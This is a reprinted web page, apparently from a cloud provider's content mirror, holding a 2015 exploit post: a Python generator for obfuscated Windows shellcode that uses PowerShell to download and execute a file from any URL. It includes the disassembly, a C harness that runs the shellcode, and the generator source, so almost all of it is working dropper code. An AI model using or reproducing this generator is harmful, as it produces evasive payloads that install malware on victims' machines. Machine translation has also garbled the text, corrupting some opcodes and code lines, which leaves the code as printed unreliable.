< reprint >win X86-64-download & Execute (Generator)

Source: Internet
Author: User
Tags windows 7 x64 windows x86

#Title: obfuscated Shellcode Windows x86/x64 Download and Execute [use PowerShell]-generator#length:dynamic! depend on URL and filename#date:20 January 2015#author:ali razmjoo#tested on:windows 7 x64 ultimate#winexec = 0x77 b1e695#exitprocess = 0x77ae2acf#==================================== #Execute: #powershell-command "& {( New-object net.webclient). DownloadFile (' Http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe ', ' D:\Ali.exe ')};D: \ali.exe "#==== ================================ #Ali Razmjoo, [' [email protected] ', ' [email protected] '] #Thanks to my Friends, Dariush Nasirpour and Ehsan nezami#################################################### #How it work? " C:\users\ali\desktop>python "Windows x86 Download and execute.py" Enter urlexample:http://z3r0d4y.com/ File.exeenter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exeenter filenameexample:d:\ File.exeenter:c:\ali.exec:\users\ali\desktop>nasm-f elf Shellcode.asm-o Shellcode.oc:\users\ali\desktop>objdump-d shellcode.oshellcode.o:file format elf32-i386disassembly of section. text:0 0000000 <.text>: 0:31 C0 xor%eax,%eax 2:50 push%eax 3:6    8 $0x22654141 push 8:58 pop%eax 9:c1 E8 shr $0x8,%eax c:c1 E8 shr $0x8,%eax f:50 push%eax 10:b8 0b 4 D mov $0x4d0b4734,%eax 15:BB 5d 6e/mov $0x356e695d,%ebx 1a:31 d8 x or%ebx,%eax 1c:50 push%eax 1d:b8-ten mov $0x22103243,%eax 22:b                      b 6e 4e mov $0x4e516e79,%ebx 27:31 D8 xor%ebx,%eax 29:50 Push%eax 2a:b8, MOV $0x32420560,%eax 2f:bb, the Mov $0x71797849,%        EBX 34:31 D8           XOR%ebx,%eax 36:50 push%eax 37:B8 0f 1c 2c MOV $0x142c1c0f,%                      EAX 3C:BB 6a $0X3349646A,%EBX mov 41:31 D8 xor%ebx,%eax 43:50 Push%eax 44:b8 3e 0b mov $0x400b3e07,%eax 49:BB $6e mov $  0X6E625246,%EBX 4e:31 D8 xor%ebx,%eax 50:50 push%eax 51:b8 0a                   $0X7780A44,%EAX mov 56:bb 5b mov $0x5b424963,%ebx 5b:31 d8   XOR%ebx,%eax 5d:50 push%eax 5e:b8 0f 4b 0d mov $0xd4b160f,%eax 63:                      BB 6a 2d mov $0x2d67316a,%ebx 68:31 D8 xor%ebx,%eax 6a:50 Push%eax 6b:b8 5c 1f mov $0x1f5c6218,%eax 70:BB, 4c, all in MOV $0x67394c6     1,%EBX 75:31 D8              XOR%ebx,%eax 77:50 push%eax 78:B8 1b 2d 1e 1f mov $0x1f1e2d1                      B,%EAX 7D:BB 6b 6a 6b mov $0x6b6a586b,%ebx 82:31 D8 xor%ebx,%eax 84:50    Push%eax 85:B8 mov $0x66414045,%eax 8A:BB 3d  $0X4977783D,%EBX 8f:31 D8 xor%ebx,%eax 91:50 push%eax 92:b8 02                   1f 4b mov $0x454b1f02,%eax 97:BB 6d 6b 6a mov $0x6a386b6d,%ebx 9c:31 d8  XOR%ebx,%eax 9e:50 push%eax 9f:b8 3e mov $0x32193e24,%eax                      A4:BB 4e 6a 5a mov $0x5a6a4e45,%ebx a9:31 D8 xor%ebx,%eax ab:50 Push%EAX AC:B8 5e 3a/MOV $0x353a5e00,%eax B1:BB 6c $5b mov $0x5b 49736C,%EBX b6:31 D8                   XOR%ebx,%eax b8:50 push%eax b9:b8 1f Notoginseng mov $0x24   40371f,%eax be:bb 6d $0X4132526D,%EBX mov c3:31 D8 xor%ebx,%eax c5:          %eax c6:b8 2e $0x3168352e,%eax CB:BB 5a 4c 45 41   mov $0x41454c5a,%ebx d0:31 D8 xor%ebx,%eax d2:50 push%eax D3:                   B8 1e 1c, MOV $0x151c1e48,%eax D8:BB, 6e, $0X61696E67,%EBX mov dd:31 d8 XOR%ebx,%eax df:50 push%eax e0:b8 0d 5d mov $0x5d0d2826,                      %eax e5:bb 4f $0X3362454F,%EBX mov ea:31 D8 xor%ebx,%eax ec:50    Push%eax ed:b8 1d mov $0x451d5720,%eax F2:BB   $0X36637847,%EBX F7:D8 xor%ebx,%eax f9:50 push%eax FA:B8 6a 3b MOV $0x3b246a04,%eax FF:BB 4b $0x494b4477,%ebx 104:31 D8 xor%ebx,%eax 10          6:50 push%eax 107:b8 0f 0a mov $0x320a0f18,%eax 10C:BB 6c 6e 78 47 mov $0x47786e6c,%ebx 111:31 D8 xor%ebx,%eax 113:50 push%eax 11                   4:B8 7d 3c $0x273c187d,%eax mov 119:bb, 6c 5d, mov $0x555d6c52,%ebx 11e:31 d8 XOR%ebx,%eax 120:50 push%eax 121:b8, MOV $0x6060                       4403,%EAX 126:BB 5a 4f mov $0x4f5a3477,%ebx 12b:31 D8 xor%ebx,%eax 12d:50 Push%eax 12E:B8 6b 1f mov $0x201f6b47,%eax 133:BB 6f 4c + mo V $0X54774C6F,%EBX 138:31 D8 xor%ebx,%eax 13a:50 push%eax 13B:B8 2a 5e 2b mo V $0x202b5e2a,%eax 140:bb 6c PNS mov $0x4547376c,%ebx 145:31 D8 xor%ebx,%e          Ax 147:50 push%eax 148:b8 0e mov $0xe120759,%eax 14D:BB 6a mov $0x6a736835,%ebx 152:31 D8 xor%ebx,%eax 154:50 push%ea X 155:B8 2c mov $0x2c115901,%eax 15A:BB mov $0x42663645,%ebx 15f:31 D8 xor%ebx,%eax 161:50 push%eax 162:b8 4e 5a mov $0x   5a4e2222,%eax 167:BB 4c $0x7467564c,%ebx 16c:31 D8 xor%ebx,%eax 16e:          %EAX 16f:b8 1b, MOV $0x481b3700,%eax 174:BB 5b 2d MOV $0x2d725b43,%ebX 179:31 D8 xor%ebx,%eax 17b:50 push%eax 17C:B8 4a 1f 22 13 mov $0x13221f4a,%eax 181:BB (mov) $0x71474864,%ebx 186:31 D8 xor%eb X,%eax 188:50 push%eax 189:B8 6a mov $0x1803236a,%eax 18E:BB 4a 6d 6   6 6c mov $0x6c666d4a,%ebx 193:31 D8 xor%ebx,%eax 195:50 push   %eax 196:B8 2d 1c mov $0x1c57542d,%eax 19B:BB $0X68343147,%EBX 1a0:    D8 xor%ebx,%eax 1a2:50 push%eax 1a3:b8 4e 5a mov $0x5a36154e,%eax 1a8:bb $0x38793839,%ebx 1ad:31 D8 xor%ebx,%eax          1AF:50 Push%eax 1b0:b8 7f 1f mov $0x41f7f59,%eax 1B5:BB 79 57 51 61 MOV $0x61515779,%ebx 1ba:31 D8 xor%ebx,%eax 1bc:50 push%eax 1bd:b8 1d 2f    mov $0x2f1d5647,%eax 1c2:bb 3d $0X543D7065,%EBX mov 1c7:31 D8 xor %ebx,%eax 1c9:50 push%eax 1ca:b8 2c mov $0x5408182c,%eax 1CF:BB 4d 6c mov $0x746c764d,%ebx 1d4:31 d8 xor%ebx,%eax 1d6:50 p Ush%EAX 1D7:B8 5a 1b mov $0x1b58345a,%eax 1DC:BB 1 5b (mov $0x76355b39,%ebx) e1:31 D8 xor%ebx,%eax 1e3:50 push%eax 1e4:b8 3f 0f 4b m OV $0x414b0f3f,%eax 1E9:BB 6b 6c mov $0x6c6b6353,%ebx 1ee:31 D8 xor%ebx,%           EAX 1f0:50 push%eax 1F1:B8 4a 1e 0b mov $0xb591e4a,%eax 1f6:bb (6d) 6e MOV $0x6e316D38,%EBX 1fb:31 D8 xor%ebx,%eax 1fd:50 push%eax 1FE:B8 2b 2a mov $0x2a162b49,%eax 203:bb-4f mov $0x4f614439,%ebx 208:31 d8 xo R%ebx,%eax 20a:50 push%eax 20b:89 E0 mov%esp,%eax 20D:BB 41 41    $0x1414141,%ebx mov 212:c1 eb $0x8,%ebx shr 215:c1 eb                      $0X8,%EBX 218:c1 eb, shr $0x8,%ebx 21b:53 push%ebx 21c:50  Push%eax 21D:BB e6 B1 The $0X77B1E695,%EBX 222:ff D3 call *%EBX 224:BB CF 2a AE $0X77AE2ACF,%EBX mov 229:ff d3 call *%ebxc:\users\ali\desktop&gt ; #you have your shellcode now=======================================shellcode.c#include <stdio.h> #include < String.h>int Main () {UnsigneD Char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d \x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\ X79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\ X6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\ X31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\ Xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\ X50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\ Xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\ X48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\ x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\ x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\ X31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\ Xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\ X50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\ Xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\ X2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\ X7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\ X08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\ X41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\ X50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\    Xcf\x2a\xae\x77\xff\xd3 "; fprintf (stdout," Length:%d\n\n ", strlen (Shellcode)); (* (Void (*) ()) shellcode) ();} =======================================C:\USERS\ALI\DESKTOP&GT;GCC Shellcode.c-o shellcode.exeC:\Users\Ali\  Desktop>shellcode.exelength:173c:\users\ali\desktop> #notice: When program exit, you must wait 2-3 second, it'll Finish download and execute file after 2-3 second ' import random,binasciichars = ' Abcdefghijklmnopqrstuvwxyzabcdefghijk lmnopqrstuvwxyz123456789=[]-' P1 = ' xor eax,eaxpush eax ' ' p2 = ' mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08 SHR ebx,0x08push ebxpush Eaxmov ebx,0x77b1e695call ebxmov ebx,0x77ae2acfcall ebx "' sen1 = str (raw_input (' Enter url\ Nexample:http://z3r0d4y.com/file.exe \nenter: ')) Sen1 = Sen1.rsplit () Sen1 = Sen1[0]sen2 = str (raw_input (' Enter filename\nexample:d:\\file.exe\nenter: ')) Sen2 = Sen2.rsplit () sen2 = Sen2[0]sen = ' PowerShell -command "& {(New-object net.webclient).        DownloadFile ('%s ', '%s ')};%s ""% (sen1,sen2,sen2) m = 0for word in Sen:m + = 1m = M-1stack = ' while (m>=0):        Stack + = Sen[m] M-= 1stack = Stack.encode (' hex ') skip = 1if len (stack)% 8 = = 0:skip = 0if Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 if Skip is 1:sta                ck = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 If Skip is 1:        stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0if len (stack)% 8 = = 0: Zxzxzxz = 0m = Len (stack)/8c = 0n = 0z = 8SHF = open (' Shellcode.asm ', ' W ') Shf.write (p1) shf.close () SHF = open (' Shellcod E.asm ', ' a ') while (c<m): v = ' push 0x ' + stack[n:z] Skip = 0 if ' 0x000000 ' in V:                Skip = 1 q1 = v[13:] v = ' push 0x ' + q1 + ' 414141 ' + ' \ n ' + ' pop eax\nshr ea X,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x0000 ' in v:skip = 1 q1 = v[11: ] v = ' push 0x ' + q1 + ' 4141 ' + ' \ n ' + ' pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x00 ' I n V:skip = 1 q1 = v[9:] v = ' push 0x ' + q1 + ' + ' + ' \ n ' + ' pop eax\nshr eax                , 0x08\npush eax\n ' If Skip is 1:shf.write (v) if skip is 0:v = V.rsplit () zzz = ' for W in V:if ' 0x ' in w:zzz =                 STR (w) S1 = Binascii.b2a_hex (". Join (Random.choice (chars) for I in range (4))) S1 = ' 0x%s '%% data = "%x"% (int (zzz, +) ^ int (s1, +)) v = ' mov Eax,0x%s\nmov ebx,%s\nxor eax,ebx\npus      H eax\n '% (DATA,S1)          Shf.write (v) n + = 8 z + 8 c + = 1shf.write (p2) shf.close () 

  

---restore content ends---

< reprint >win X86-64-download & Execute (Generator)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.